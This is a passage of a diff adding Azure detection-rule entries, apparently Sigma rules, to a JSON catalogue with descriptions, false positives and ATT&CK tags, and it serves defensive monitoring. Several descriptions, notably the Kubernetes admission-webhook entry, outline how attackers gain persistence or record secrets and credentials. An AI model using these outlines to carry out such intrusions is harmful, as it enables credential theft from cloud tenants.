"logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_legacy_authentication_protocols.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1212" + ] + }, + "uuid": "60f6535a-760f-42a9-be3f-c9a0a025906e", + "value": "Use of Legacy Authentication Protocols" + }, + { + "description": "Detects when an end user consents to an application", + "meta": { + "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", + "creation_date": "2022/07/28", + "falsepositive": [ + "Unknown" + ], + "filename": "azure_app_end_user_consent.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#end-user-consent", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_end_user_consent.yml" + ], + "tags": [ + "attack.privilege_escalation" + ] + }, + "uuid": "9b2cc4c4-2ad4-416d-8e8e-ee6aa6f5035a", + "value": "End User Consent" + }, + { + "description": "Define a baseline threshold for failed sign-ins due to Conditional Access failures", + "meta": { + "author": "Yochana Henderson, '@Yochana-H'", + "creation_date": "2022/06/01", + "falsepositive": [ + "Service Account misconfigured", + "Misconfigured Systems", + "Vulnerability Scanners" + ], + "filename": "azure_conditional_access_failure.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_conditional_access_failure.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1110" + ] + }, + "uuid": "b4a6d707-9430-4f5f-af68-0337f52d5c42", + "value": "Sign-in Failure Due to Conditional Access Requirements Not Met" + }, + { + "description": "Detects when an app is assigned Azure AD roles, such as global adminsitrator, or Azure RBAC roles, such as subscription owner.", + "meta": { + "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", + "creation_date": "2022/07/19", + "falsepositive": [ + "When the permission is legitimately needed for the app" + ], + "filename": "azure_app_role_added.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#service-principal-assigned-to-a-role", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_role_added.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "b04934b2-0a68-4845-8a19-bdfed3a68a7a", + "value": "App Role Added" + }, + { + "description": "Resource owner password credentials (ROPC) should be avoided if at all possible as this requires the user to expose their current password credentials to the application directly.\nThe application then uses those credentials to authenticate the user against the identity provider.\n", + "meta": { + "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", + "creation_date": "2022/06/01", + "falsepositive": [ + "Applications that are being used as part of automated testing or a legacy application that cannot use any other modern authentication flow" + ], + "filename": "azure_app_ropc_authentication.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-authentication-flows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_ropc_authentication.yml" + ], + "tags": [ + "attack.t1078", + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.initial_access" + ] + }, + "uuid": "55695bc0-c8cf-461f-a379-2535f563c854", + "value": "Applications That Are Using ROPC Authentication Flow" + }, + { + "description": "Change to authentication method could be an indicated of an attacker adding an auth method to the account so they can have continued access.", + "meta": { + "author": "AlertIQ", + "creation_date": "2021/10/10", + "falsepositive": [ + "Unknown" + ], + "filename": "azure_change_to_authentication_method.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_change_to_authentication_method.yml" + ], + "tags": [ + "attack.credential_access" + ] + }, + "uuid": "4d78a000-ab52-4564-88a5-7ab5242b20c7", + "value": "Change to Authentication Method" + }, + { + "description": "Detects when a user that doesn't have permissions to invite a guest user attempts to invite one.", + "meta": { + "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", + "creation_date": "2022/08/10", + "falsepositive": [ + "A non malicious user is unaware of the proper process" + ], + "filename": "azure_guest_invite_failure.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_guest_invite_failure.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.t1078" + ] + }, + "uuid": "0b4b72e3-4c53-4d5b-b198-2c58cfef39a9", + "value": "Guest User Invited By Non Approved Inviters" + }, + { + "description": "Identifies when a service principal is created in Azure.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/02", + "falsepositive": [ + "Service principal being created may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Service principal created from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_service_principal_created.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_service_principal_created.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "0ddcff6d-d262-40b0-804b-80eb592de8e3", + "value": "Azure Service Principal Created" + }, + { + "description": "Identifies when a key vault is modified or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/16", + "falsepositive": [ + "Key Vault being modified or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Key Vault modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_keyvault_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_keyvault_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact", + "attack.credential_access", + "attack.t1552", + "attack.t1552.001" + ] + }, + "uuid": "459a2970-bb84-4e6a-a32e-ff0fbd99448d", + "value": "Azure Key Vault Modified or Deleted" + }, + { + "description": "Detect access has been blocked by Conditional Access policies.\nThe access policy does not allow token issuance which might be sights≈ of unauthorizeed login to valid accounts.\n", + "meta": { + "author": "AlertIQ", + "creation_date": "2021/10/10", + "falsepositive": [ + "Unknown" + ], + "filename": "azure_user_login_blocked_by_conditional_access.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_user_login_blocked_by_conditional_access.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1110" + ] + }, + "uuid": "9a60e676-26ac-44c3-814b-0c2a8b977adf", + "value": "User Access Blocked by Azure Conditional Access" + }, + { + "description": "Detects when a temporary access pass (TAP) is added to an account. TAPs added to priv accounts should be investigated", + "meta": { + "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", + "creation_date": "2022/08/10", + "falsepositive": [ + "Administrator adding a legitmate temporary access pass" + ], + "filename": "azure_tap_added.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#changes-to-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_tap_added.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1078" + ] + }, + "uuid": "fa84aaf5-8142-43cd-9ec2-78cfebf878ce", + "value": "Temporary Access Pass Added To An Account" + }, + { + "description": "Detects when a user has been elevated to manage all Azure Subscriptions.\nThis change should be investigated immediately if it isn't planned.\nThis setting could allow an attacker access to Azure subscriptions in your environment.\n", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/11/26", + "falsepositive": [ + "If this was approved by System Administrator." + ], + "filename": "azure_subscription_permissions_elevation_via_auditlogs.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#assignment-and-elevation", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_subscription_permissions_elevation_via_auditlogs.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1078" + ] + }, + "uuid": "ca9bf243-465e-494a-9e54-bf9fc239057d", + "value": "Azure Subscription Permission Elevation Via AuditLogs" + }, + { + "description": "Detects when an account was created and deleted in a short period of time.", + "meta": { + "author": "Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1', Tim Shelton", + "creation_date": "2022/08/11", + "falsepositive": [ + "Legit administrative action" + ], + "filename": "azure_ad_account_created_deleted.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-user-accounts#short-lived-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_account_created_deleted.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1078" + ] + }, + "uuid": "6f583da0-3a90-4566-a4ed-83c09fe18bbf", + "value": "Account Created And Deleted Within A Close Time Frame" + }, + { + "description": "Identifies when Rule Collections (Application, NAT, and Network) is being modified or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/08", + "falsepositive": [ + "Rule Collections (Application, NAT, and Network) being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Rule Collections (Application, NAT, and Network) modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_firewall_rule_collection_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_firewall_rule_collection_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "025c9fe7-db72-49f9-af0d-31341dd7dd57", + "value": "Azure Firewall Rule Collection Modified or Deleted" + }, + { + "description": "Identifies when an admission controller is executed in Azure Kubernetes.\nA Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server.\nThe behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster.\nAn adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster.\nFor example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod.\nAn adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials.\nAn adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information.\n", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/11/25", + "falsepositive": [ + "Azure Kubernetes Admissions Controller may be done by a system administrator.", + "If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_kubernetes_admission_controller.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_admission_controller.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1078", + "attack.credential_access", + "attack.t1552", + "attack.t1552.007" + ] + }, + "uuid": "a61a3c56-4ce2-4351-a079-88ae4cbd2b58", + "value": "Azure Kubernetes Admission Controller" + }, + { + "description": "Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used.", + "meta": { + "author": "sawwinnnaung", + "creation_date": "2020/05/07", + "falsepositive": [ + "Valid change" + ], + "filename": "azure_rare_operations.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/RareOperations.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_rare_operations.yml" + ], + "tags": [ + "attack.t1003" + ] + }, + "uuid": "c1182e02-49a3-481c-b3de-0fadc4091488", + "value": "Rare Subscription-level Operations In Azure" + }, + { + "description": "Detects when sign-ins increased by 10% or greater.", + "meta": { + "author": "Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1'", + "creation_date": "2022/08/11", + "falsepositive": [ + "Unlikely" + ], + "filename": "azure_ad_auth_failure_increase.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-for-failed-unusual-sign-ins", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_auth_failure_increase.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1078" + ] + }, + "uuid": "e1d02b53-c03c-4948-b11d-4d00cca49d03", + "value": "Increased Failed Authentications Of Any Type" + }, + { + "description": "Monitor and alert for Bitlocker key retrieval.", + "meta": { + "author": "Michael Epping, '@mepples21'", + "creation_date": "2022/06/28", + "falsepositive": [ + "Unknown" + ], + "filename": "azure_ad_bitlocker_key_retrieval.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#bitlocker-key-retrieval", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_bitlocker_key_retrieval.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1078" + ] + }, + "uuid": "a0413867-daf3-43dd-9245-734b3a787942", + "value": "Bitlocker Key Retrieval" + }, + { + "description": "Detects when a new owner is added to an application. This gives that account privileges to make modifications and configuration changes to the application.", + "meta": { + "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", + "creation_date": "2022/06/02", + "falsepositive": [ + "When a new application owner is added by an administrator" + ], + "filename": "azure_app_owner_added.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#new-owner", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_owner_added.yml" + ], + "tags": [ + "attack.t1528", + "attack.persistence", + "attack.credential_access", + "attack.defense_evasion" + ] + }, + "uuid": "74298991-9fc4-460e-a92e-511aa60baec1", + "value": "Added Owner To Application" + }, + { + "description": "Identifies when a application gateway is modified or deleted.", + "meta": { + "author": "Austin Songer", + "creation_date": "2021/08/16", + "falsepositive": [ + "Application gateway being modified or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Application gateway modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_application_gateway_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_application_gateway_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "ad87d14e-7599-4633-ba81-aeb60cfe8cd6", + "value": "Azure Application Gateway Modified or Deleted" + }, + { + "description": "Detect when a user has reset their password in Azure AD", + "meta": { + "author": "YochanaHenderson, '@Yochana-H'", + "creation_date": "2022/08/03", + "falsepositive": [ + "If this was approved by System Administrator or confirmed user action." + ], + "filename": "azure_user_password_change.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_user_password_change.yml" + ], + "tags": [ + "attack.t1078" + ] + }, + "uuid": "340ee172-4b67-4fb4-832f-f961bdc1f3aa", + "value": "Password Reset By User Account" + }, + { + "description": "Monitor and alert on group membership additions of groups that have CA policy modification access", + "meta": { + "author": "Mark Morowczynski '@markmorow', Thomas Detzner '@tdetzner'", + "creation_date": "2022/08/04", + "falsepositive": [ + "User removed from the group is approved" + ], + "filename": "azure_group_user_addition_ca_modification.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure#conditional-access", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_group_user_addition_ca_modification.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ] + }, + "uuid": "91c95675-1f27-46d0-bead-d1ae96b97cd3", + "value": "User Added To Group With CA Policy Modification Access" + }, + { + "description": "Detect when users in your Azure AD tenant are authenticating to other Azure AD Tenants.", + "meta": { + "author": "MikeDuddington, '@dudders1'", + "creation_date": "2022/06/30", + "falsepositive": [ + "If this was approved by System Administrator." + ], + "filename": "azure_users_authenticating_to_other_azure_ad_tenants.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-external-user-sign-ins", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_users_authenticating_to_other_azure_ad_tenants.yml" + ], + "tags": [ + "attack.t1078" + ] + }, + "uuid": "5f521e4b-0105-4b72-845b-2198a54487b9", + "value": "Users Authenticating To Other Azure AD Tenants" + }, + { + "description": "Identifies when an user or application modified the federation settings on the domain.", + "meta": { + "author": "Austin Songer", + "creation_date": "2021/09/06", + "falsepositive": [ + "Federation Settings being modified or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Federation Settings modified from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_federation_modified.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-monitor-federation-changes", + "https://attack.mitre.org/techniques/T1078", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_federation_modified.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1078" + ] + }, + "uuid": "352a54e1-74ba-4929-9d47-8193d67aba1e", + "value": "Azure Domain Federation Settings Modified" + }, + { + "description": "Identifies when a application security group is modified or deleted.", + "meta": { + "author": "Austin Songer", + "creation_date": "2021/08/16", + "falsepositive": [ + "Application security group being modified or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Application security group modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_application_security_group_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_application_security_group_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "835747f1-9329-40b5-9cc3-97d465754ce6", + "value": "Azure Application Security Group Modified or Deleted" + }, + { + "description": "Detect when authentications to important application(s) only required single-factor authentication", + "meta": { + "author": "MikeDuddington, '@dudders1'", + "creation_date": "2022/07/28", + "falsepositive": [ + "If this was approved by System Administrator." + ], + "filename": "azure_ad_auth_to_important_apps_using_single_factor_auth.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_auth_to_important_apps_using_single_factor_auth.yml" + ], + "tags": [ + "attack.t1078" + ] + }, + "uuid": "f272fb46-25f2-422c-b667-45837994980f", + "value": "Authentications To Important Apps Using Single Factor Authentication" + }, + { + "description": "Identifies the deletion of Azure Kubernetes Pods.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/07/24", + "falsepositive": [ + "Pods may be deleted by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Pods deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_kubernetes_pods_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://github.com/elastic/detection-rules/blob/065bf48a9987cd8bd826c098a30ce36e6868ee46/rules/integrations/azure/impact_kubernetes_pod_deleted.toml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_pods_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "b02f9591-12c3-4965-986a-88028629b2e1", + "value": "Azure Kubernetes Pods Deleted" + }, + { + "description": "Detects when a new credential is added to an existing application. Any additional credentials added outside of expected processes could be a malicious actor using those credentials.", + "meta": { + "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", + "creation_date": "2022/05/26", + "falsepositive": [ + "When credentials are added/removed as part of the normal working hours/workflows" + ], + "filename": "azure_app_credential_added.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-credentials", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_credential_added.yml" + ], + "tags": [ + "attack.t1098", + "attack.persistence" + ] + }, + "uuid": "cbb67ecc-fb70-4467-9350-c910bdf7c628", + "value": "Added Credentials to Existing Application" + }, + { + "description": "Identifies when a device or device configuration in azure is modified or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/03", + "falsepositive": [ + "Device or device configuration being modified or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Device or device configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_device_or_configuration_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#core-directory", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_device_or_configuration_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "46530378-f9db-4af9-a9e5-889c177d3881", + "value": "Azure Device or Configuration Modified or Deleted" + }, + { + "description": "Identifies when a application is deleted in Azure.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/03", + "falsepositive": [ + "Application being deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Application deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_application_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_application_deleted.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "410d2a41-1e6d-452f-85e5-abdd8257a823", + "value": "Azure Application Deleted" + }, + { + "description": "Define a baseline threshold and then monitor and adjust to suit your organizational behaviors and limit false alerts from being generated.", + "meta": { + "author": "Corissa Koopmans, '@corissalea'", + "creation_date": "2022/04/21", + "falsepositive": [ + "Failed Azure AD Connect Synchronization", + "Service account use with an incorrect password specified", + "Misconfigured systems", + "Vulnerability scanners" + ], + "filename": "azure_aad_secops_signin_failure_bad_password_threshold.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_aad_secops_signin_failure_bad_password_threshold.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1110" + ] + }, + "uuid": "dff74231-dbed-42ab-ba49-83289be2ac3a", + "value": "Sign-in Failure Bad Password Threshold" + }, + { + "description": "Detects when a user has been elevated to manage all Azure Subscriptions.\nThis change should be investigated immediately if it isn't planned.\nThis setting could allow an attacker access to Azure subscriptions in your environment.\n", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/11/26", + "falsepositive": [ + "If this was approved by System Administrator." + ], + "filename": "azure_subscription_permissions_elevation_via_activitylogs.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftauthorization", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_subscription_permissions_elevation_via_activitylogs.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1078" + ] + }, + "uuid": "09438caa-07b1-4870-8405-1dbafe3dad95", + "value": "Azure Subscription Permission Elevation Via ActivityLogs" + }, + { + "description": "Identifies when a Firewall Rule Configuration is Modified or Deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/08", + "falsepositive": [ + "Firewall Rule Configuration being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Firewall Rule Configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_network_firewall_rule_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_network_firewall_rule_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "2a7d64cf-81fa-4daf-ab1b-ab80b789c067", + "value": "Azure Firewall Rule Configuration Modified or Deleted" + }, + { + "description": "Detects when a Azure Kubernetes Cluster is created or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/07", + "falsepositive": [ + "Kubernetes cluster being created or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Kubernetes cluster created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_kubernetes_cluster_created_or_deleted.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://attack.mitre.org/matrices/enterprise/cloud/", + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", + "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_cluster_created_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "9541f321-7cba-4b43-80fc-fbd1fb922808", + "value": "Azure Kubernetes Cluster Created or Deleted" + }, + { + "description": "Detects when a user is removed from a privileged role. Bulk changes should be investigated.", + "meta": { + "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", + "creation_date": "2022/08/05", + "falsepositive": [ + "Legtimate administrator actions of removing members from a role" + ], + "filename": "azure_priviledged_role_assignment_bulk_change.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_priviledged_role_assignment_bulk_change.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ] + }, + "uuid": "102e11e3-2db5-4c9e-bc26-357d42585d21", + "value": "Bulk Deletion Changes To Privileged Account Permissions" + }, + { + "description": "Identifies when a network security configuration is modified or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/08", + "falsepositive": [ + "Network Security Configuration being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Network Security Configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_network_security_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_network_security_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "d22b4df4-5a67-4859-a578-8c9a0b5af9df", + "value": "Azure Network Security 